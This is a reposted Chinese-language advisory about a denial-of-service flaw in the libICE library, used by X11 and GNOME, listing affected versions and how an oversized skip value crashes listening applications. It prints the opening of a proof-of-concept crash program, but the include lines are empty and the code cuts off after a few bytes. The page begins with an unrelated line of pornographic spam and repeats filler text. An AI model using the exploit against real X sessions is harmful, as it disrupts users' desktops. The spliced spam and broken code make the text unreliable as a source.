偷偷摘套内射激情视频,久久精品99国产国产精,中文字幕无线乱码人妻,中文在线中文a,性爽19p

對libICE 庫拒絕服務攻擊漏洞的深入解析

安全 漏洞
此文章主要講述的是libICE 庫拒絕服務攻擊漏洞,以及對libICE 庫拒絕服務攻擊漏洞中所涉及到受影響系統(tǒng)的相關內容的描述。

此文章主要講述的是libICE 庫拒絕服務攻擊漏洞,如果你對libICE 庫拒絕服務攻擊漏洞有興趣的話,你就可以對以下的文章點擊觀看了,以下就是具體內容的描述,希望在你今后的學習中會有所幫助。

受影響系統(tǒng):

 

GNOME Gnome 1.1

GNOME GNOME 1.0.x

Open Group X 11.0R6.x

Open Group X 11.0R6

Open Group X 11.0R5

XFree86 X11R6 4.0

XFree86 X11R6 3.3.6

- RedHat Linux 6.2 i386

XFree86 X11R6 3.3.5

- RedHat Linux 6.1 i386

XFree86 X11R6 3.3.4

XFree86 X11R6 3.3.3

不受影響系統(tǒng):

GNOME Gnome 1.2

描述:

libICE是X11 window系統(tǒng)的一部分。由于在處理SKIP_STRING宏的時候存在一些問題,導致

任何使用libICE創(chuàng)建監(jiān)聽socket的應用程序都可以被遠程攻擊,使之停止服務。攻擊者可以

給skip提供一個很大的值,使指針指向某些未初始化的內存區(qū)域,從而發(fā)生段訪問錯誤。

GNOME中大量的使用了libICE,因此攻擊者可能對正在運行GNOME的用戶的X會話發(fā)動攻擊。

<* 來源:Chris Evans *>

測試方法:

警 告

以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!

/* icebreak.c - Chris Evans */

#include

#include

#include

int

main(int argc, const char* argv[])

{

unsigned char c;

unsigned int i;

unsigned short s;

char blankbuf[1000];

memset(blankbuf, '\0', sizeof(blankbuf));

/* Assume fd 1 is stdout */

/* ICE connection header */

/* First, pick an endian-ness */

/* Byte 1: Major opcode. Must be 0 */

c = 0;

write(1, &c, 1);

/* Byte 2: Minor opcode. Must be ICE_ByteOrder (1) */

以上的相關內容就是對libICE 庫拒絕服務攻擊漏洞的介紹,望你能有所收獲。

 

libICE 庫拒絕服務攻擊漏洞

上述的相關內容就是對libICE 庫拒絕服務攻擊漏洞的描述,希望會給你帶來一些幫助在此方面。

【編輯推薦】

  1. HP Tru64 UNIX ypserv拒絕服務攻擊漏洞
  2. Sun Solaris內核補丁拒絕服務攻擊漏洞
  3. Kerio個人防火墻工具拒絕服務攻擊漏洞
  4. Cisco IPS包處理拒絕服務攻擊漏洞
  5. Linux Kernel SCTP拒絕服務攻擊漏洞
責任編輯:佚名 來源: 比特網
相關推薦

2009-07-12 16:50:08

2010-10-11 12:29:52

2010-10-09 14:59:30

2011-03-03 11:26:09

2010-09-14 16:54:16

2009-08-29 16:45:27

2009-10-22 11:28:38

2010-09-29 14:27:06

2009-10-24 10:29:56

2009-10-28 10:36:38

2012-08-20 10:15:44

2015-08-21 10:11:25

2010-01-15 11:21:12

2009-07-12 16:24:57

2011-08-11 09:02:58

2009-10-27 14:17:49

2024-09-25 15:32:23

2011-12-29 09:21:09

TomcatHashtable

2009-11-02 12:25:30

2025-06-27 09:02:08

點贊
收藏

51CTO技術棧公眾號